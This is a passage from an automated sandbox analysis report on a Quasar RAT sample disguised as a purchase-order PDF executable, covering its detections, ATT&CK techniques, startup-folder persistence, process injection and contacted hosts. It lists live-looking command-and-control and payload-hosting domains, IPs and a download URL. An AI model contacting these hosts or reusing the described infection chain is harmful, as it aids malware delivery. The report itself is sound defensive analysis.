                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeQueries volume information: C:\Users\user\AppData\Roaming\Directory.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Quasar RAT
                    Source: Yara matchFile source: 0.2.PO#83298373729383838392387373873PDF.exe.7b0ba40.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.InstallUtil.exe.7c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO#83298373729383838392387373873PDF.exe.7b0ba40.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.4584532065.0000000000AE0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4592317023.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2200782194.0000000002DE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4584532065.00000000007C2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2241711429.00000000079E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2227430823.0000000003B78000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: PO#83298373729383838392387373873PDF.exe PID: 6500, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7116, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected Quasar RAT
                    Source: Yara matchFile source: 0.2.PO#83298373729383838392387373873PDF.exe.7b0ba40.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.InstallUtil.exe.7c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO#83298373729383838392387373873PDF.exe.7b0ba40.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.4584532065.0000000000AE0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4592317023.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2200782194.0000000002DE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4584532065.00000000007C2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2241711429.00000000079E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2227430823.0000000003B78000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: PO#83298373729383838392387373873PDF.exe PID: 6500, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7116, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information111
                    Scripting                    		Valid Accounts1
                    Scheduled Task/Job                    		111
                    Scripting                    		211
                    Process Injection                    		1
                    Masquerading                    		OS Credential Dumping1
                    Query Registry                    		Remote Services11
                    Archive Collected Data                    		11
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		1
                    Disable or Modify Tools                    		LSASS Memory21
                    Security Software Discovery                    		Remote Desktop ProtocolData from Removable Media1
                    Non-Standard Port                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt2
                    Registry Run Keys / Startup Folder                    		2
                    Registry Run Keys / Startup Folder                    		31
                    Virtualization/Sandbox Evasion                    		Security Account Manager1
                    Process Discovery                    		SMB/Windows Admin SharesData from Network Shared Drive3
                    Ingress Tool Transfer                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCron1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		211
                    Process Injection                    		NTDS31
                    Virtualization/Sandbox Evasion                    		Distributed Component Object ModelInput Capture3
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information                    		LSA Secrets1
                    Application Window Discovery                    		SSHKeylogging14
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Hidden Files and Directories                    		Cached Domain Credentials1
                    File and Directory Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Obfuscated Files or Information                    		DCSync12
                    System Information Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                    Software Packing                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    DLL Side-Loading                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1560131 Sample: PO#832983737293838383923873... Startdate: 21/11/2024 Architecture: WINDOWS Score: 100 26 teewire.ydns.eu 2->26 28 sierrassinfinusadas.com.ar 2->28 34 Found malware configuration 2->34 36 Malicious sample detected (through community Yara rule) 2->36 38 Antivirus detection for URL or domain 2->38 40 13 other signatures 2->40 7 PO#83298373729383838392387373873PDF.exe 15 5 2->7         started        12 wscript.exe 1 2->12         started        signatures3 process4 dnsIp5 30 sierrassinfinusadas.com.ar 167.250.5.91, 443, 49707, 49737 NUTHOSTSRLAR Argentina 7->30 20 C:\Users\user\AppData\Roaming\Directory.exe, PE32 7->20 dropped 22 C:\Users\user\AppData\...\Directory.vbs, ASCII 7->22 dropped 24 C:\Users\...\Directory.exe:Zone.Identifier, ASCII 7->24 dropped 42 Drops VBS files to the startup folder 7->42 44 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->44 46 Writes to foreign memory regions 7->46 48 Injects a PE file into a foreign processes 7->48 14 InstallUtil.exe 8 7->14         started        50 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->50 18 Directory.exe 14 2 12->18         started        file6 signatures7 process8 dnsIp9 32 teewire.ydns.eu 208.70.254.118, 2195, 49716, 49730 AS-COLOAMUS United States 14->32 52 Hides that the sample has been downloaded from the Internet (zone.identifier) 14->52 54 Multi AV Scanner detection for dropped file 18->54 56 Machine Learning detection for dropped file 18->56 signatures10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    PO#83298373729383838392387373873PDF.exe24%ReversingLabsByteCode-MSIL.Trojan.Generic
                    PO#83298373729383838392387373873PDF.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\Directory.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\Directory.exe24%ReversingLabsByteCode-MSIL.Trojan.Generic

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://sierrassinfinusadas.com.arD0%Avira URL Cloudsafe
                    teewire.ydns.eu100%Avira URL Cloudmalware
                    https://sierrassinfinusadas.com.ar/rindasq/Mktxz.vdf0%Avira URL Cloudsafe
                    https://sierrassinfinusadas.com.ar/rindasq/Mktxz.vdf(B0%Avira URL Cloudsafe
                    http://sierrassinfinusadas.com.ar0%Avira URL Cloudsafe
                    http://sierrassinfinusadas.com.ar(B0%Avira URL Cloudsafe
                    https://sierrassinfinusadas.com.ar0%Avira URL Cloudsafe
                    http://sierrassinfinusadas.com.ard0%Avira URL Cloudsafe
                    https://sierrassinfinusadas.com.ar/rindasq/Mktxz.vdfL0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    teewire.ydns.eu
                    		208.70.254.118
                    		truetrue
                      		unknown
                      sierrassinfinusadas.com.ar
                      		167.250.5.91
                      		truefalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://sierrassinfinusadas.com.ar/rindasq/Mktxz.vdffalse
                        • Avira URL Cloud: safe
                        		unknown
                        teewire.ydns.eutrue
                        • Avira URL Cloud: malware
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://api.ipify.org/PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2227430823.0000000003B78000.00000004.00000800.00020000.00000000.sdmp, PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2241711429.00000000079E2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4584532065.00000000007C2000.00000040.00000400.00020000.00000000.sdmpfalse
                          		high
                          https://sierrassinfinusadas.com.arDDirectory.exe, 00000005.00000002.4589476945.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002FE7000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.000000000304D000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002FDB000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002F80000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002F93000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000003007000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002D86000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002E87000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002FF8000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002F5A000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002FBC000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002E36000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002E77000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002DED000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002F9D000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002E5D000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002FC5000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002D75000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://sierrassinfinusadas.com.ar/rindasq/Mktxz.vdf(BDirectory.exe, 00000005.00000002.4589476945.0000000002F9D000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://github.com/mgravell/protobuf-netiPO#83298373729383838392387373873PDF.exe, 00000000.00000002.2239194272.0000000006AB0000.00000004.08000000.00040000.00000000.sdmpfalse
                            		high
                            https://stackoverflow.com/q/14436606/23354PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2239194272.0000000006AB0000.00000004.08000000.00040000.00000000.sdmp, PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2227430823.0000000003B78000.00000004.00000800.00020000.00000000.sdmp, PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2200782194.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2241711429.00000000079E2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4592317023.0000000002B1C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4584532065.00000000007C2000.00000040.00000400.00020000.00000000.sdmpfalse
                              		high
                              http://sierrassinfinusadas.com.ardDirectory.exe, 00000005.00000002.4589476945.0000000002BB9000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002FE7000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002D93000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.000000000304D000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002D47000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002BC3000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.00000000029F7000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002FDB000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002A7D000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002F80000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002F93000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000003007000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002D6B000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002D86000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://github.com/mgravell/protobuf-netJPO#83298373729383838392387373873PDF.exe, 00000000.00000002.2239194272.0000000006AB0000.00000004.08000000.00040000.00000000.sdmpfalse
                                		high
                                https://stackoverflow.com/q/11564914/23354;PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2239194272.0000000006AB0000.00000004.08000000.00040000.00000000.sdmp, PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2227430823.0000000003B78000.00000004.00000800.00020000.00000000.sdmp, PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2241711429.00000000079E2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4584532065.00000000007C2000.00000040.00000400.00020000.00000000.sdmpfalse
                                  		high
                                  https://stackoverflow.com/q/2152978/23354PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2239194272.0000000006AB0000.00000004.08000000.00040000.00000000.sdmpfalse
                                    		high
                                    http://sierrassinfinusadas.com.arDirectory.exe, 00000005.00000002.4589476945.0000000002BB9000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002FE7000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002D93000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.000000000304D000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002D47000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002BC3000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.00000000029F7000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002FDB000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002A7D000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002F80000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002F93000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000003007000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002D6B000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002D86000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://github.com/mgravell/protobuf-netPO#83298373729383838392387373873PDF.exe, 00000000.00000002.2239194272.0000000006AB0000.00000004.08000000.00040000.00000000.sdmpfalse
                                      		high
                                      https://stackoverflow.com/q/2152978/23354sCannotPO#83298373729383838392387373873PDF.exe, 00000000.00000002.2227430823.0000000003B78000.00000004.00000800.00020000.00000000.sdmp, PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2241711429.00000000079E2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4584532065.00000000007C2000.00000040.00000400.00020000.00000000.sdmpfalse
                                        		high
                                        https://ipwho.is/PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2227430823.0000000003B78000.00000004.00000800.00020000.00000000.sdmp, PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2241711429.00000000079E2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4584532065.00000000007C2000.00000040.00000400.00020000.00000000.sdmpfalse
                                          		high
                                          https://sierrassinfinusadas.com.arPO#83298373729383838392387373873PDF.exe, 00000000.00000002.2200782194.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePO#83298373729383838392387373873PDF.exe, 00000000.00000002.2200782194.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4592317023.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://sierrassinfinusadas.com.ar(BDirectory.exe, 00000005.00000002.4589476945.0000000002B43000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002BE5000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002B8A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://sierrassinfinusadas.com.ar/rindasq/Mktxz.vdfLDirectory.exe, 00000005.00000002.4589476945.0000000002E55000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002D93000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.000000000304D000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002FDB000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002F80000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000003007000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002A46000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002E87000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002BE5000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002FF8000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002F5A000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002E36000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002E77000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002F9D000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002E5D000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002FC5000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002EB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            208.70.254.118
                                            		teewire.ydns.euUnited States
                                            		21769AS-COLOAMUStrue
                                            167.250.5.91
                                            		sierrassinfinusadas.com.arArgentina
                                            		264649NUTHOSTSRLARfalse

                                            General Information

                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1560131
                                            Start date and time:2024-11-21 12:54:04 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 8m 51s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:7
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:PO#83298373729383838392387373873PDF.exe
                                            Detection:MAL
                                            Classification:mal100.troj.expl.evad.winEXE@6/3@2/2
                                            EGA Information:
                                            • Successful, ratio: 66.7%
                                            HCA Information:
                                            • Successful, ratio: 94%
                                            • Number of executed functions: 94
                                            • Number of non-executed functions: 6
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                                            Warnings

                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target Directory.exe, PID 6236 because it is empty
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                            • VT rate limit hit for: PO#83298373729383838392387373873PDF.exe

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            06:54:54API Interceptor58x Sleep call for process: PO#83298373729383838392387373873PDF.exe modified
                                            06:55:13API Interceptor9511867x Sleep call for process: Directory.exe modified
                                            06:56:05API Interceptor65x Sleep call for process: InstallUtil.exe modified
                                            12:55:03AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Directory.vbs

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            167.250.5.91ORDER 20240986 OA.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                              PO#8329837372938383839238PDF.exeGet hashmaliciousXWormBrowse
                                                SecuriteInfo.com.FileRepMalware.29777.16321.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                  EQ_AW24 New Order Request.xlx.exeGet hashmaliciousGuLoader, StormKitty, XWormBrowse
                                                    PRICE ENQUIRY - RFQ 6000073650.exeGet hashmaliciousGuLoaderBrowse
                                                      PRICE ENQUIRY - RFQ 6000073650.exeGet hashmaliciousAzorult, GuLoaderBrowse

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        sierrassinfinusadas.com.arORDER 20240986 OA.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                        • 167.250.5.91
                                                        PO#8329837372938383839238PDF.exeGet hashmaliciousXWormBrowse
                                                        • 167.250.5.91
                                                        SecuriteInfo.com.FileRepMalware.29777.16321.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                        • 167.250.5.91
                                                        EQ_AW24 New Order Request.xlx.exeGet hashmaliciousGuLoader, StormKitty, XWormBrowse
                                                        • 167.250.5.91
                                                        PRICE ENQUIRY - RFQ 6000073650.exeGet hashmaliciousGuLoaderBrowse
                                                        • 167.250.5.91
                                                        PRICE ENQUIRY - RFQ 6000073650.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                        • 167.250.5.91

                                                        ASNs

